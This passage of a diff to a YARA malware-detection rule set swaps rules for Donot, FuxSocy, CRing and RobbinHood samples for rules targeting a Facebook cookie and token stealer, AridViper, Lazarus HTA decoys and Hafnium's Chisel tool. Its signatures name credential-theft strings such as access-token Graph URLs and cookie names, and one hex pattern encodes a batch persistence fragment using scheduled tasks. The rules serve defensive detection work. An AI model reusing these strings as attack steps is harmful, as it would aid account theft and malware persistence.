-		$s4 = { 64 48 8b 0c 25 f8 ff ff ff 48 [0-5] 3b ?? 10 0f 86 [2] 00 00 48 ?? ec }
-		$s5 = { 48 83 ec 78 48 89 6c 24 70 48 8d 6c 24 70 48 8b 05 [3] 00 48 8b 0d [3] 00 48 8b 15 [3] 00 48 89 0c 24 48 89 44 24 08 48 89 54 24 10 e8 [3] ff 48 8b 44 24 18 48 85 c0 0f 84 10 01 00 00 48 8b 48 28 48 8b 50 20 48 8b 40 18 48 89 04 24 48 89 54 24 08 48 89 4c 24 10 e8 [3] ff 48 8b 44 24 18 48 8b 4c 24 20 48 8b 54 24 28 48 8b 5c 24 30 48 85 d2 0f 85 a3 00 00 00 48 8d 15 [2] 03 00 48 39 d0 0f 85 13 01 00 00 48 8b 05 [3] 00 48 8b 15 [3] 00 48 89 04 24 48 89 54 24 08 48 89 4c 24 10 48 8b 84 24 80 00 00 00 48 89 44 24 18 48 8b 84 24 88 00 00 00 48 89 44 24 20 48 8b 84 24 90 00 00 00 48 89 44 24 28 e8 [3] ff 48 8b 44 24 38 48 8b 4c 24 40 48 8b 54 24 48 48 8b 5c 24 50 48 8b 74 24 30 48 89 b4 24 98 00 00 00 48 89 84 24 a0 00 00 00 48 89 8c 24 a8 00 00 00 48 89 94 24 b0 00 00 00 48 89 9c 24 b8 00 00 00 48 8b 6c 24 }
-		$s6 = { 48 81 ec 48 01 00 00 48 89 ac 24 40 01 00 00 48 8d ac 24 40 01 00 00 48 8d 7c 24 38 48 8d 35 [2] 0f 00 48 89 6c 24 f0 48 8d 6c 24 f0 e8 [3] ff 48 8b 6d 00 48 8d 05 [2] 02 00 48 89 04 24 48 8b 84 24 50 01 00 00 48 89 44 24 08 48 89 44 24 10 e8 [3] ff 48 8b 44 24 18 48 89 84 24 38 01 00 00 31 c9 eb 18 8b 54 84 38 48 8b 5c 24 30 48 8b 84 24 38 01 00 00 89 14 98 48 8d 4b 01 48 8b 94 24 50 01 00 00 48 39 d1 7d 2c 48 89 4c 24 30 90 48 8b 05 [3] 00 48 89 04 24 48 c7 44 24 08 40 00 00 00 e8 [3] ff 48 8b 44 24 10 48 83 f8 40 72 b1 eb 46 48 c7 04 24 00 00 00 00 48 89 44 24 08 48 89 54 24 10 48 89 54 24 18 e8 [3] ff 48 8b 44 24 28 48 8b 4c 24 20 48 89 8c 24 58 01 00 00 48 89 84 24 60 01 00 00 48 8b ac 24 40 01 00 }
+		$x1 = "C:\\Users\\admin1\\AppData\\Local\\Temp\\samplebin.exe" fullword wide
+		$x2 = "https://graph.facebook.com/v7.0/act_fb_uid?access_token=fb_access_token&_index=5&_reqName=adaccount&_reqSrc=AdsCMPaymentsAccount" ascii
+		$x3 = "https://graph.facebook.com/v7.0/act_fb_uid?access_token=fb_access_token&_reqName=adaccount&_reqSrc=AdsCMPaymentsAccountDataDispa" ascii
+		$x4 = "Cookie:" fullword ascii
+		$x5 = "autoLoginCookie name=" fullword ascii
+		$x6 = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.113 Safari/537.36" fullword wide
+		$s7 = "https://graph.facebook.com/v7.0/act_fb_uid?access_token=fb_access_token&_priority=HIGH&_reqName=adaccount&_reqSrc=AdsCMAccountSp" ascii
+		$s8 = "https://www.facebook.com/login/device-based/login/" fullword wide
+		$s9 = "api/?sid=" fullword wide
+		$s10 = "/deleteregkey" fullword ascii
+		$s11 = "Old cookies folder of Edge/IE" fullword ascii
+		$s12 = "https://graph.facebook.com/v7.0/me/adaccounts?access_token=fb_access_token&_reqName=me%2Fadaccounts&_reqSrc=AdsTypeaheadDataMana" ascii
+		$s13 = "https://graph.facebook.com/v7.0/me/adaccounts?access_token=fb_access_token&_reqName=me%2Fadaccounts&_reqSrc=AdsTypeaheadDataMana" ascii
+		$s14 = "ChromeCookiesView.exe" fullword wide
+		$s15 = "EdgeCookiesView.exe" fullword wide
+		$s16 = "Software\\Microsoft\\Windows\\CurrentVersion\\Run" fullword wide
+		$s17 = "login/device-based/login" fullword ascii
+		$s18 = "c_user" fullword wide
+		$s19 = "c:\\Projects\\VS2005\\EdgeCookiesView\\Release\\EdgeCookiesView.pdb" fullword ascii
 
 	condition:
-		uint32( 0 ) == 0x464C457F and filesize > 25KB and all of ( $s* )
+		uint16( 0 ) == 0x5a4d and filesize < 2600KB and ( pe.imphash ( ) == "89c8a19cc2d9172de5901988530c700d" or ( ( 3 of ( $x* ) ) and ( 8 of ( $s* ) ) ) )
 }
-rule ARKBIRD_SOLG_APT_Donot_Downloader_May_2021_1 : FILE
+rule ARKBIRD_SOLG_APT_Aridviper_Installer_Feb_2020_1 : FILE
 {
 	meta:
-		description = "Detect the trojan downloader used by Donot group"
+		description = "Detect Installer used by AridViper group in Febuary 2021"
 		author = "Arkbird_SOLG"
-		id = "251a809e-9e36-5c46-955f-006531bd9619"
-		date = "2020-05-09"
-		modified = "2021-05-09"
+		id = "3d891aeb-b4d6-50f2-ad08-cb6d9d56064d"
+		date = "2021-02-08"
+		modified = "2021-02-09"
 		reference = "Internal Research"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-05-09/Donot/APT_Donot_Downloader_May_2021_1.yara#L1-L20"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-02-08/AridViper/APT_AridViper_Installer_Feb_2020_1.yar#L1-L26"
 		license_url = "N/A"
-		logic_hash = "df64ab97b74935ce8b73c3854eb81fa1dbd4e59b1e27c43ae9c85b90aaaef6f7"
-		score = 75
-		quality = 75
+		logic_hash = "1fca713b7ac7f3e960a4174325c32578724e87241e159fbf7754c7e2d19779a1"
+		score = 50
+		quality = 69
 		tags = "FILE"
-		hash1 = "28aa296bda12f0184564c5f6b46e679f07255aa8df58b861ea17910cdcaa674a"
-		hash2 = "03730cdc23a3d10c8752ad1464ff2e68a64c69f8310b0ceea4d52b1db0215dfc"
-		hash3 = "edd590c343570f7576aca83da58967e058585c6ba861682dca2fc987c713ee3a"
-		tlp = "White"
-		adversary = "Donot"
+		level = "Experimental"
+		hash1 = "16ed131c4a7545495dc3f07d199748a5d0560e7c8a44493c1906163bedc9c2e0"
+		hash2 = "84d9c7852b87253ccf0ca1aad57e510a4badfe253c063a72c7751930f0279c83"
 
 	strings:
-		$seq1 = { 65 63 68 6f 20 6f 66 66 0a 20 6d 64 20 25 73 20 0a 20 6d 64 20 25 73 20 0a 20 6d 64 20 25 73 20 0a 20 6d 64 20 25 73 20 0a 20 6d 64 20 25 73 20 0a 20 20 61 74 74 72 69 62 20 2b 61 20 2b 68 20 2b 73 20 25 73 20 0a 20 61 74 74 72 69 62 20 2b 61 20 2b 68 20 2b 73 20 25 73 20 0a 20 61 74 74 72 69 62 20 2b 61 20 2b 68 20 2b 73 20 25 73 20 0a 20 61 74 74 72 69 62 20 2b 61 20 2b 68 20 2b 73 20 25 73 20 0a 20 64 65 6c 20 2f 66 20 25 73 20 0a 20 53 45 54 20 2f 41 20 25 25 43 4f 4d 50 55 54 45 52 4e 41 4d 45 25 25 20 0a 20 53 45 54 20 2f 41 20 52 41 4e 44 3d 25 25 52 41 4e 44 4f 4d 25 25 20 31 30 30 30 30 20 2b 20 32 20 0a 20 65 63 68 6f 20 25 25 43 4f 4d 50 55 54 45 52 4e 41 4d 45 25 25 2d 25 25 52 41 4e 44 25 25 20 3e 3e 20 25 73 20 0a 20 73 63 68 74 61 73 6b 73 20 2f 64 65 6c 65 74 65 20 2f 74 6e 20 4d 6f 62 55 70 64 61 74 65 20 2f 66 20 20 0a 20 73 63 68 74 61 73 6b 73 20 2f 64 65 6c 65 74 65 20 2f 74 6e 20 54 61 73 6b 55 70 64 61 74 65 20 2f 66 20 0a 20 73 63 68 74 61 73 6b 73 20 2f 64 65 6c 65 74 65 20 2f 74 6e 20 4d 61 63 68 69 6e 65 43 6f 72 65 20 2f 66 20 0a 20 73 63 68 74 61 73 6b 73 20 2f 63 72 65 61 74 65 20 2f 73 63 20 6d 69 6e 75 74 65 20 2f 6d 6f 20 32 30 20 2f 66 20 2f 74 6e 20 54 61 73 6b 55 70 64 61 74 65 20 2f 74 72 20 25 73 20 20 0a 20 73 63 68 74 61 73 6b 73 20 2f 63 72 65 61 74 65 20 2f 73 63 20 6d 69 6e 75 74 65 20 2f 6d 6f 20 31 30 20 2f 66 20 2f 74 6e 20 4d 61 63 68 69 6e 65 43 6f 72 65 20 2f 74 72 20 25 73 20 0a 20 6d 6f 76 65 20 25 25 41 50 50 44 41 54 41 25 }
-		$seq2 = { c7 44 24 10 00 00 00 00 c7 44 24 0c 00 00 00 00 c7 44 24 08 00 00 00 00 c7 44 24 04 00 00 00 00 c7 04 24 ?? 42 [2] e8 ?? 01 00 00 83 ec 14 [0-3] c7 44 24 14 00 00 00 00 c7 44 24 10 00 00 00 00 c7 44 24 0c 00 00 00 00 c7 44 24 08 00 00 00 00 [2-5] 24 04 [0-3] 89 04 24 e8 ?? 01 00 00 83 ec 18 89 [1-9] c7 44 24 04 ?? 43 [2] c7 04 24 ?? 61 [2] e8 ?? 08 00 00 }
-		$s1 = "VirtualQuery failed for %d bytes at address %p" fullword ascii
-		$s2 = { 25 73 5c [1-14] 2e 62 61 74 }
-		$s3 = { 25 73 5c [1-14] 25 }
+		$seq_db = { 8b 7d ec 33 d2 89 55 ec 8b 0f 8b c1 89 4d e4 38 11 74 2e 66 90 83 f8 ff 73 24 8a 08 40 80 f9 c0 72 16 8a 08 80 e1 c0 80 f9 80 75 0c 8a 48 01 40 80 e1 c0 80 f9 80 74 f4 42 80 38 00 75 d7 89 55 ec f7 46 18 00 00 08 00 74 47 8b d7 8b cb e8 a2 f9 ff ff 89 45 e0 85 c0 74 34 83 7d f0 01 b9 [3] 00 50 ff 75 f8 b8 [3] 00 ff 75 e4 0f 44 c8 51 ff 75 f4 68 [3] 00 53 e8 34 2e 00 00 8b 55 e0 83 c4 1c 8b ce e8 ?? c3 fc ff 8b 55 ec ff 75 e4 8b 45 f8 b9 [3] 00 83 7d f0 01 52 50 50 50 50 50 b8 [3] 00 0f 44 c1 50 ff 75 f4 68 [3] 00 53 e8 f8 2d 00 00 83 c4 2c ba [3] 00 8b ce ff 75 f4 e8 e6 2e 00 00 83 c4 04 85 c0 74 16 ff 37 ff 75 f8 ff 75 f4 68 [3] 00 53 e8 cc 2d 00 00 83 c4 14 8b d7 8b cb e8 90 f9 ff ff 89 45 e0 85 c0 74 1e 50 8b 45 f8 50 50 68 [3] 00 53 e8 a8 2d 00 00 8b 55 e0 83 c4 14 8b ce e8 ?? c3 fc ff f7 46 18 00 00 08 00 74 2e 8b cf e8 db e5 00 00 8b f0 85 f6 74 1e 0f 1f 44 00 00 8b 16 3b d7 74 0c ff 32 8b cb e8 f1 f9 ff ff 83 c4 04 8b 76 0c 85 f6 75 e7 8b 75 e8 ff 75 f8 8b d7 8b cb e8 d8 f9 ff ff 83 c4 04 }
+		$seq_createdb = { 8a 43 42 84 c0 78 05 0f be c0 eb 07 8b cf e8 ?? 91 fb ff 8b 4d f8 8b d0 e8 ?? 90 fb ff 68 [3] 00 8b d6 8b cb e8 4d fc ff ff 8b f8 83 c4 04 85 ff 0f 85 41 01 00 00 68 [3] 00 8b d6 8b cb e8 32 fc ff ff 8b f8 83 c4 04 85 ff 0f 85 26 01 00 00 68 [3] 00 8b d6 8b cb e8 17 fc ff ff 8b f8 83 c4 04 85 ff 0f 85 0b 01 00 00 68 [3] 00 8b d6 8b cb e8 fc fb ff ff 8b f8 83 c4 04 85 ff 0f 85 f0 00 00 00 68 [3] 00 8b d6 8b cb e8 e1 fb ff ff 8b f8 83 c4 04 85 ff 0f 85 d5 00 00 00 68 [3] 00 8b d6 8b cb e8 c6 fb ff ff 8b f8 83 c4 04 85 ff 0f 85 ba 00 00 00 68 [3] 00 8b d6 8b cb e8 eb fa ff ff 8b f8 83 c4 04 85 ff 0f 85 9f 00 00 00 33 f6 0f 1f 40 00 0f 1f 84 00 00 00 00 00 }
+		$OP_Files1 = { 51 68 [3] 00 b9 [3] 00 e8 [2] 00 00 80 3d [3] 00 00 75 04 33 c9 eb 11 b9 [3] 00 8d 51 01 8a 01 41 84 c0 75 f9 2b ca 51 68 [3] 00 b9 [3] 00 e8 [2] 00 00 6a ?? 68 [3] 00 b9 [3] 00 e8 [2] 00 00 6a ?? 68 [3] 00 b9 [3] 00 e8 [2] 00 00 }
+		$OP_Files2 = { 00 00 83 c4 04 83 78 18 10 72 05 8b 40 04 eb 03 83 c0 04 [3-9] 00 50 68 [3] 00 6a 00 6a 00 ff [1-5] 8b 95 c8 fe ff ff 83 fa 10 72 0c 8b 8d b4 fe ff ff }
+		$s1 = "D$t9D$ }J" fullword ascii
+		$s2 = "u#h`KN" fullword ascii
+		$s3 = { 6f 73 5f 77 69 6e 2e 63 3a 25 64 3a 20 28 25 6c 75 29 20 25 73 28 25 73 29 20 2d 20 25 73 }
+		$s4 = { 61 63 63 65 73 73 20 74 6f 20 25 73 2e 25 73 2e 25 73 20 69 73 20 70 72 6f 68 69 62 69 74 65 64 }
+		$s5 = { 25 00 6c 00 73 00 28 00 25 00 64 00 29 }
+		$s6 = { 23 46 69 6c 65 20 45 72 72 6f 72 23 28 25 64 29 20 3a }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 10KB and all of ( $seq* ) and 2 of ( $s* )
+		uint16( 0 ) == 0x5a4d and filesize > 600KB and 3 of ( $s* ) and $seq_db and $seq_createdb and all of ( $OP_Files* )
 }
-rule ARKBIRD_SOLG_RAN_Fuxsocy_May_2021_1 : FILE
+rule ARKBIRD_SOLG_APT_Lazarus_HTA_Apr_2021_1 : FILE
 {
 	meta:
-		description = "Detect FuxSocy ransomware"
+		description = "Detect HTA with the fake picture header as decoy used by Lazarus"
 		author = "Arkbird_SOLG"
-		id = "2420c2fa-bc94-51a6-87ab-4e8d226fdd23"
-		date = "2020-05-09"
-		modified = "2021-05-09"
+		id = "1a57251e-f0fb-541c-bf8b-f1afecf7f1c7"
+		date = "2021-04-27"
+		modified = "2021-04-27"
 		reference = "Internal Research"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-05-09/FuxSocy/RAN_FuxSocy_May_2021_1.yara#L1-L19"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-04-27/Lazarus/APT_Lazarus_HTA_Apr_2021_1.yara#L1-L21"
 		license_url = "N/A"
-		logic_hash = "ab34f95d2b12bdf2d362538e880301542c3308fff427cfb5ee59e9dca89ec033"
+		logic_hash = "40c2e5b662d1999c3ae5be97604bb9ebc809a383d66331cb4b385666ce55be2a"
 		score = 75
-		quality = 75
+		quality = 63
 		tags = "FILE"
-		hash1 = "d786355c1b3dc741103873aed46d8ffa3430d113a27482f37f3ffc7c978747f6"
-		hash2 = "43bbfb3389deb3846bba19a8ab2e9c8fd9b581720962b8170d4a63ad816b5804"
-		tlp = "White"
-		adversary = "-"
+		hash1 = "888cfc87b44024c48eed794cc9d6dea9f6ae0cc3468dee940495e839a12ee0db"
+		tlp = "white"
+		adversary = "Lazarus"
 
 	strings:
-		$seq1 = { b8 48 14 00 00 e8 b8 83 00 00 53 55 56 8d 44 24 48 8b e9 50 55 89 54 24 14 33 f6 ff 15 84 02 41 00 8b d8 85 db 0f 84 fa 00 00 00 57 8b cb e8 2b 09 00 00 8b f8 85 ff 0f 84 e7 00 00 00 57 53 56 55 ff 15 8c 02 41 00 8b 1d 78 02 41 00 8d 44 24 18 50 8d 44 24 18 50 68 cc 14 48 00 57 89 74 24 24 89 74 24 28 ff d3 83 7c 24 18 04 0f 82 ab 00 00 00 8b 44 24 10 8b 4c 24 14 c7 44 24 1c 00 15 48 00 c7 44 24 20 14 15 48 00 c7 44 24 24 30 15 48 00 c7 44 24 28 48 15 48 00 c7 44 24 2c 60 15 48 00 c7 44 24 30 80 15 48 00 c7 44 24 34 a0 15 48 00 c7 44 24 38 c0 15 48 00 c7 44 24 3c e0 15 48 00 c7 44 24 40 fc 15 48 00 c7 44 24 44 14 16 48 00 c7 44 24 48 38 16 48 00 ff 74 84 1c 0f b7 41 02 50 0f b7 01 50 8d 44 24 60 68 54 16 48 00 50 ff 15 64 02 41 00 83 c4 14 8d 44 24 50 50 8d 44 24 14 50 8d 44 24 5c 50 57 ff d3 85 c0 74 0d 8b 4c 24 10 33 d2 e8 47 0a 00 00 8b f0 8b cf e8 c9 08 00 00 5f 8b c6 5e 5d 5b 81 c4 48 14 00 00 }
-		$seq2 = { 8d 44 24 50 50 8d 44 24 4c 50 8d 44 24 2c 50 55 ff 15 ec 00 41 00 8b 44 24 14 8b 74 24 18 ff 74 24 68 88 87 57 01 08 00 66 a1 80 4d 41 00 [10] 88 9f 54 01 08 00 c6 87 63 01 08 00 10 89 b7 58 01 08 00 66 89 87 5d 01 08 00 ff 15 6c 00 41 00 0f b6 97 63 01 08 00 03 c0 66 89 87 55 01 08 00 8b 44 24 20 8d 8f 64 01 08 00 88 87 5c 01 08 00 e8 14 2b 00 00 8b 44 24 14 0f b6 c8 0f b7 87 55 01 08 00 83 c1 03 8d 0c c8 89 8f 4c 01 08 00 e8 2e 3a 00 00 8b c8 89 8f 48 01 08 00 85 c9 0f 84 0f 01 00 00 8b 44 24 28 89 41 04 8b 8f 48 01 08 00 8b 44 24 24 89 01 8b 8f 48 01 08 00 8b 44 24 4c 89 41 0c 8b 8f 48 01 08 00 8b 44 24 48 89 41 08 8b 8f 48 01 08 00 8b 44 24 54 89 41 14 8b 8f 48 01 08 00 8b 44 24 50 89 41 10 0f b7 87 55 01 08 00 50 8b 87 48 01 08 00 ff 74 24 6c 83 c0 18 50 e8 b4 b5 00 00 8b 4c 24 6c 33 d2 e8 bd 3b 00 00 8b 4c 24 70 33 d2 89 47 08 e8 af 3b 00 00 0f b6 97 63 01 08 00 89 47 0c 8b 44 24 78 89 87 28 02 08 00 8b 44 24 44 89 47 04 8d 87 44 00 08 00 50 8d 8f 64 01 08 00 89 2f e8 4d 24 00 00 89 b7 18 02 08 00 8b 87 c5 01 08 00 f7 a7 58 01 08 00 8b c8 0f b6 87 5c 01 08 00 8b f2 99 83 c4 10 ff b7 28 02 08 00 03 c8 13 f2 03 0d 80 4d 41 00 13 35 84 4d 41 00 89 8f 1c 02 08 00 89 b7 20 02 08 00 ff 15 c4 00 41 00 53 57 ff 74 24 44 55 ff 15 e8 00 41 00 }
-		$seq3 = { 57 68 ff 01 0f 00 ff 75 08 8b fa 51 32 db ff 15 0c 00 41 00 8b f0 85 f6 74 76 32 ff eb 52 84 ff 75 65 33 c0 50 50 50 50 50 50 50 6a ff 6a 04 6a ff 56 ff 15 10 00 41 00 8b 45 c0 83 f8 01 74 2c 76 2e 83 f8 03 76 1a 83 f8 04 75 24 8d 45 e0 50 6a 01 56 ff 15 18 00 41 00 }
-		$seq4 = { 6a ff 8d 45 fc 50 8d 45 08 50 8d 45 f8 50 ff 33 33 ff 89 7d f8 89 7d 08 89 7d fc ff 15 c8 00 41 00 85 c0 8b 45 08 0f 95 c1 85 c0 74 59 56 }
-		$seq5 = { 8b 45 08 56 ff 70 08 ff 15 dc 00 41 00 8b ce e8 af 2e 00 00 33 ff 57 ff 75 08 57 ff 33 ff 15 e4 }
+		$s1 = { 0a 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 3e }
+		$s2 = { 5b 27 4f 70 65 6e 54 65 78 74 46 69 6c 65 27 2c 27 43 72 65 61 74 65 54 65 78 74 46 69 6c 65 27 }
+		$s3 = { 5b 27 70 75 73 68 27 5d }
+		$s4 = { 28 27 4d 5a 27 29 2c 65 5b 27 43 6c 6f 73 65 27 5d 28 29 }
+		$s5 = { 5b 27 73 68 69 66 74 27 5d 28 29 }
+		$s6 = { 3b 76 61 72 20 64 61 74 61 3d 5b }
+		$s7 = { 62 3d 6e 65 77 20 41 63 74 69 76 65 58 4f 62 6a 65 63 74 28 27 53 63 72 69 70 74 69 6e 67 2e 46 69 6c 65 53 79 73 74 65 6d 4f 62 6a 65 63 74 27 29 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 30KB and 3 of ( $seq* )
+		( uint16( 0 ) == 0x4d42 or uint16( 0 ) == 0xd8ff or uint32( 0 ) == 0x474e5089 or uint32( 0 ) == 0x38464947 ) and filesize > 20KB and 5 of ( $s* )
 }
-rule ARKBIRD_SOLG_RAN_Cring_Apr_2021_1 : FILE
+rule ARKBIRD_SOLG_APT_Chisel_Hafnium_Feb_2021_1 : FILE
 {
 	meta:
-		description = "Detect CRing ransomware"
+		description = "Rule for detecting Chisel kit tool used by Hafnium"
 		author = "Arkbird_SOLG"
-		id = "3648494d-8c27-5767-90e8-45e294aac382"
-		date = "2021-04-08"
-		modified = "2021-04-09"
+		id = "cd6be3b4-71fd-5e17-8835-a331a24fc5d6"
+		date = "2021-02-23"
+		modified = "2021-04-25"
 		reference = "Internal Research"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-04-08/CRing/RAN_CRing_Apr_2021_1.yara#L1-L19"
-		license_url = "N/A"
-		logic_hash = "d82db146c9048391d79bda6cc5913363fc3cfc1a7cca26b23b362b7f3563ef3c"
-		score = 50
-		quality = 75
-		tags = "FILE"
-		hash1 = "274ef2fba8ba46187f9cf462a02de286ea23ec75d163af01088f6856944817eb"
-		hash2 = "f7d270ca0f2b4d21830787431f881cd004b2eb102cc3048c6b4d69cb775511c8"
-		hash3 = "ebb528207b2fc06a6bc89e9d430bcdfe254f0838b0f4660f67cc6bd1ebc193be"
-		level = "Experimental"
-
-	strings:
-		$str1 = { 1b 30 03 00 4a 00 00 00 03 00 00 11 02 73 23 00 00 0a 0a 06 6f 24 00 00 0a 2d 3a 02 72 [1-4] 00 00 70 28 25 00 00 0a 0b 72 [1-4] 00 00 70 02 28 25 00 00 0a 28 1a 00 00 0a 06 6f 26 00 00 0a 07 7e 01 00 00 04 28 05 00 00 06 2c 06 06 6f 27 00 00 0a de 03 26 de 00 2a 00 00 01 10 00 00 00 00 1b 00 2b 46 00 03 13 00 00 01 }
-		$str2 = { 1b 30 05 00 1a 01 00 00 04 00 00 11 16 0a 73 28 00 00 0a 0b 07 6f 29 00 00 0a 1e 5b 8d 2c 00 00 01 0c 07 6f 2a 00 00 0a 1e 5b 8d 2c 00 00 01 0d 73 2b 00 00 0a 13 06 11 06 08 6f 2c 00 00 0a 11 06 09 6f 2c 00 00 0a de 0c 11 06 2c 07 11 06 6f 12 00 00 0a dc 08 8e 69 09 8e 69 58 8d 2c 00 00 01 13 04 08 11 04 08 8e 69 28 2d 00 00 0a 09 16 11 04 08 8e 69 09 8e 69 28 2e 00 00 0a 11 04 04 28 06 00 00 06 13 04 11 04 8e 69 28 2f 00 00 0a 13 05 07 08 09 6f 30 00 00 0a 13 07 02 19 73 31 00 00 0a 13 08 03 18 73 31 00 00 0a 13 09 11 09 11 07 17 73 32 00 00 0a 13 0a 11 09 11 05 16 11 05 8e 69 6f 33 00 00 0a 11 09 11 04 16 11 04 8e 69 6f 33 00 00 0a 11 08 11 0a 20 [4] 6f 34 00 00 0a de 30 11 0a 2c 07 11 0a 6f 12 00 00 0a dc 11 09 2c 07 11 09 6f 12 00 00 0a dc 11 08 2c 07 11 08 6f 12 00 00 0a dc 11 07 2c 07 11 07 6f 12 00 00 0a dc 17 0a de 0a 07 2c 06 07 6f 12 00 00 0a dc 06 2a 00 00 41 94 00 00 02 00 00 00 2b 00 00 00 12 00 00 00 3d 00 00 00 0c 00 00 00 00 00 00 00 02 00 00 00 ae 00 00 00 2c 00 00 00 da 00 00 00 0c 00 00 00 00 00 00 00 02 00 00 00 a2 00 00 00 44 00 00 00 e6 00 00 00 0c 00 00 00 00 00 00 00 02 00 00 00 99 00 00 00 59 00 00 00 f2 00 00 00 0c 00 00 00 00 00 00 00 02 00 00 00 90 00 00 00 6e 00 00 00 fe 00 00 00 0c 00 00 00 00 00 00 00 02 00 00 00 08 00 00 00 06 01 00 00 0e 01 00 00 0a 00 00 00 00 00 00 00 }
-		$str3 = { 1b 30 03 00 24 00 00 00 05 00 00 11 73 35 00 00 0a 0a 06 03 6f 36 00 00 0a 06 02 17 6f 37 00 00 0a 0b de 0a 06 2c 06 06 6f 12 00 00 0a dc 07 2a 01 10 00 00 02 00 06 00 12 18 00 0a 00 00 00 00 }
-
-	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 5KB and 2 of them
-}
-rule ARKBIRD_SOLG_Ran_Robbinhood_Oct_2020_1 : FILE
-{
-	meta:
-		description = "Detect RobbinHood ransomware"
-		author = "Arkbird_SOLG"
-		id = "adaacb06-0738-5d2b-b97e-b9007341f743"
-		date = "2020-11-04"
-		modified = "2020-11-05"
-		reference = "https://twitter.com/joakimkennedy/status/1323957238680178689"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-11-05/RobbinHood/Ran_RobbinHood_Oct_2020_1.yar#L1-L20"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-02-23/Hafinum/APT_Chisel_Hafnium_Feb_2021_1.yara#L1-L28"
 		license_url = "N/A"
-		logic_hash = "72d0e9b1e2f6aee8f24125e6e6801329e2fad016f05a94ad65c04874a016d09d"
+		hash = "4afa5fde76f1f3030cf7dbd12e37b717e1f902ac95c8bdf54a2e58a64faade04"
+		logic_hash = "8e56234ce59197a8df51b21b89d3a901785dbb0211ab576cb3d194de34b611de"
 		score = 75
-		quality = 67
+		quality = 57
 		tags = "FILE"
-		hash1 = "7c7ef3ab31ab91a7379bc2e3f32473dfa7adf662d0c640ef994103f6022a092b"
-		hash2 = "f927dd9044d7fa874dc6b98a0f5c9c647f3a9e5393bfe034b425cbf8db93e501"
-		hash2 = "3f56501f764d49723188bb119845fec4f2419a5080b74513fd0734e2a628e754"
+		adversary = "Hafnium"
+		tlp = "white"
 
 	strings:
-		$seq = { 20 21 3d 20 20 3c 3d 3d 20 61 73 20 20 61 74 20 20 66 70 3d 20 69 73 20 20 6c 72 3a 20 6f 66 20 20 6f 6e 20 20 70 63 3d 20 73 70 3a 20 73 70 3d 25 76 0d 0a 29 20 3d 20 29 20 6d 3d 2b 49 6e 66 2c 20 6e 20 2d 49 6e 66 2e 62 61 74 2e 63 6d 64 2e 63 6f 6d 2e 65 78 65 2f 50 49 44 31 30 36 30 33 31 32 35 3a 20 70 3d 41 43 44 54 41 43 53 54 41 45 44 54 41 45 53 54 41 4b 44 54 41 4b 53 54 41 57 53 54 41 68 6f 6d 41 74 6f 69 43 45 53 54 43 68 61 6d 44 61 73 68 45 45 53 54 47 4f 47 43 4a 75 6c 79 4a 75 6e 65 4c 69 73 75 4d 32 52 74 4d 32 52 7a 4d 32 5a 79 4d 32 63 79 4d 32 64 77 4d 33 42 79 4d 69 61 6f 4d 6f 64 69 4e 33 6f 3d 4e 5a 44 54 4e 5a 53 54 4e 65 77 61 4e 6a 41 79 51 56 4a 44 51 56 5a 51 53 41 53 54 53 74 61 74 54 55 31 54 54 68 61 69 54 6b 56 47 55 46 42 55 57 45 53 54 57 45 78 54 59 32 31 30 59 32 31 6b 59 32 35 6d 59 32 46 69 59 32 46 7a 59 32 4d 3d 59 32 52 34 59 32 52 6d 59 32 52 79 59 32 55 78 59 32 55 79 59 32 56 79 59 32 5a 6e 59 32 5a 77 59 32 5a 79 59 32 64 74 59 32 68 74 59 32 6c 69 59 32 78 7a 59 33 42 70 59 33 42 77 59 33 49 79 59 33 4a 30 59 33 4a 33 59 33 4d 3d 59 33 4e 32 59 33 4e 6f 59 33 4e 73 59 33 4e 79 59 33 4e 7a 59 33 52 6d 59 57 39 70 59 57 46 6a 59 57 49 30 59 57 4a 72 59 57 4e 30 59 57 4e 6f 59 57 4e 77 59 57 4e 79 59 57 52 69 59 57 52 70 59 57 52 77 59 57 52 7a 59 57 56 7a 59 57 6b 3d 59 57 6c 30 59 57 6c 6d 59 57 70 73 59 57 77 3d 59 58 42 71 59 58 42 72 59 58 4a 33 59 58 4e 30 59 58 4e 34 59 58 4e 6a 59 58 4e 6d 59 58 4e 74 59 58 4e 77 59 58 5a 70 59 58 64 6e 59 6d 31 77 59 6d 46 30 59 6d 46 35 59 6d 46 6a 59 6d 46 72 59 6d 46 79 59 6d 4d 32 59 6d 4d 33 59 6d 4e 76 59 6d 52 69 59 6d 5a 6d 59 6d 64 30 59 6d 6c 6e 59 6d 6c 72 59 6d 6c 75 59 6d 74 36 59 6d 74 6d 59 6d 74 77 59 6e 42 33 59 6e 4a 6b 59 6e 4e 68 59 6e 56 77 59 6e 6f 79 59 77 3d 3d 5a 32 38 3d 5a 32 46 74 5a 32 52 69 5a 32 68 76 5a 32 6c 6d 5a 33 42 6e 5a 33 4a 35 5a 33 6f 3d 5a 47 31 77 5a 47 35 6e 5a 47 39 30 5a 47 39 6a 5a 47 46 30 5a 47 46 6a 5a 47 46 7a 5a 47 49 3d 5a 47 49 77 5a 47 49 7a 5a 47 4a 34 5a 47 4a 68 5a 47 4a 6d 5a 47 4d 79 5a 47 4e 6f 5a 47 4e 79 5a 47 4e 7a 5a 47 52 6b 5a 47 52 7a 5a 47 56 74 5a 47 56 79 5a 47 56 7a 5a 47 5a 7a 5a 47 64 6a 5a 47 6c 30 5a 47 6c 6d 5a 47 6c 74 5a 47 6c 77 5a 47 6c 79 5a 47 70 32 